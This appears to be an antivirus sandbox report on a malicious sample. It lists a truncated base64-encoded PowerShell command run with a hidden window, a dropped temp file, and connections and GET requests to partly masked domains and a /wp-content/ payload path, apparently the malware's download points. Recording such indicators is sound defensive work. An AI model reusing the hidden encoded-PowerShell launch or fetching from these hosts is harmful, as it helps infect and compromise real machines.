Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAGYAaAByAG0AaABzAHMAcQBxAGkAaQBnAD0AJwBCAHIAdABmAHcAcABjAGcAYgBjACcAOwAkAFAAcQBiAGEAawBjAHUAawBpAHUAcQAgAD0AIAAnADIANwAwACcAOwAkAEkAbQBnAHoAYgBvAGQAbABoAD0AJwBVAHIAeQB6AGEAdAByAGQAcQBsAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
Modifies file system
Creates the following files
- %TEMP%\1090056.cvr
Network activity
Connects to
- 'ad###ilt15.com':80
- 'an##.or.jp':443
- 'me#####supplements.com':443
- 'vf##ool.com':443
TCP
HTTP GET requests
- http://ad###ilt15.com/wp-content/INy1yG/
- http://www.ad###ilt15.com/wp-content/INy1yG/
Other
- 'an##.or.jp':443
- 'me#####supplements.com':443
- 'vf##ool.com':443
UDP
- DNS ASK ad###ilt15.com
- DNS ASK an##.or.jp
- DNS ASK me#####supplements.com
- DNS ASK ka###ngdian.com
- DNS ASK vf##ool.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAGYAaAByAG0AaABzAHMAcQBxAGkAaQBnAD0AJwBCAHIAdABmAHcAcABjAGcAYgBjACcAOwAkAFAAcQBiAGEAawBjAHUAawBpAHUAcQAgAD0AIAAnADIANwAwACcAOwAkAEkAbQBnAHoAYgBvAGQAbABoAD0AJwBVAHIAeQB6AGEAdAByAGQAcQBsAC...' (with hidden window)
